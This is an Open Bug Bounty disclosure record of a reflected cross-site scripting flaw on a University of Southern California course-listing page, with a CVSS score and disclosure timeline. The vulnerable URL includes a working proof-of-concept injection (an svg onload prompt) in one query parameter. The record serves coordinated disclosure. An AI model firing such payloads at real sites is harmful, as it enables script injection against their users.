web-app.usc.edu XSS vulnerability

2017-12-11T20:04:00
ID OBB:452199
Type openbugbounty
Reporter ut
Modified 2018-03-11T20:04:00

Description

Open Bug Bounty ID: OBB-452199

Description| Value
---|---
Affected Website:| web-app.usc.edu
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
https://web-app.usc.edu/mobile/soc/20172/section.html?c=Technology+&+Social+Change&p=WRIT-150&i=64432%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&t=20172&n=This+course+focuses+on+how+technology+both+shapes+and+is+shaped+by+society.+In+our+writing+we+will+analyze+claims+about+technological+innovation+and+develop+original+arguments+about+the+promises,+problems,+ethics,+and+ideologies+of+this+fundamental+condition+of+modern+life.+Areas+for+exploration+include+technological+determinism,+ethical+challenges+to+technology,+political+responses+to+technology,+utopianism,+and+technology%27s+impact+of+various+social+systems,+ranging+from+the+military+to+commerce+to+the+family.&s=054

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 11 December, 2017 20:04 GMT
Vulnerability Verified:| 11 December, 2017 20:06 GMT
Website Operator Notified:| 11 December, 2017 20:06 GMT
Vulnerability Published:| 11 December, 2017 20:06 GMT [without any technical details]
Public Disclosure:| 11 March, 2018 20:04 GMT